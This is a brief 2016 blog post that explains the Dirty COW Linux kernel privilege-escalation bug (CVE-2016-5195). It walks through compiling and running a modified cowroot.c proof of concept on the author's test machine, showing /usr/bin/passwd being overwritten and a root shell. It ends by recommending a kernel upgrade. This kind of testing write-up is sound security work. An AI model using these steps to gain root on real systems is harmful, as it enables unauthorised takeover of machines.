CVE 2016-5195 dirtycow
Posted on 11 Dec 2016 in security • 2 min read
Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux Kernel. "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system." (Source: Red Hat)
So globally with the write code doing the right thing a unprivileged user can get root permission on most GNU/Linux systems. The satiric web site dirtycow.ninja/ was in the first time create to make fun of people giving name to vulnerability even a youtube video was made. Nevertheless the wiki of the website (on github) link to a few PoCs.
I test one of this PoCs on my test computer. The exploits were not fully stable at the time an my computer was sometime friezing just after getting root privileges.
I used a modified version of the cowroot.c PoCs host on a gist. First of all we compile the exploit code:
[maggick@computer_name dirtycow]$ gcc cowroot.c -o cowroot -pthread
cowroot.c: In function ‘procselfmemThread’:
cowroot.c:107:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion]
lseek(f,map,SEEK_SET);
^~~
In file included from cowroot.c:27:0:
/usr/include/unistd.h:337:16: note: expected ‘__off_t {aka long int}’ but argument is of type ‘void *’
extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
^~~~~
cowroot.c: In function ‘main’:
cowroot.c:144:5: warning: implicit declaration of function ‘asprintf’ [-Wimplicit-function-declaration]
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
^~~~~~~~
cowroot.c:148:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
fstat(f,&st);
^~~~~
The warning are not really important after the compilation we just launch the exploit:
[maggick@computer_name dirtycow]$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 47224
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
[root@computer_name dirtycow]# id
uid=0(root) gid=1000(maggick) groups=1000(maggick)
And we got root privileges as planned. The exploit replace the
/usr/bin/passwd
executable so we need to restore it with the one in
/tmp/bak
.
In order to correct this vulnerability we just need to upgrade our kernel.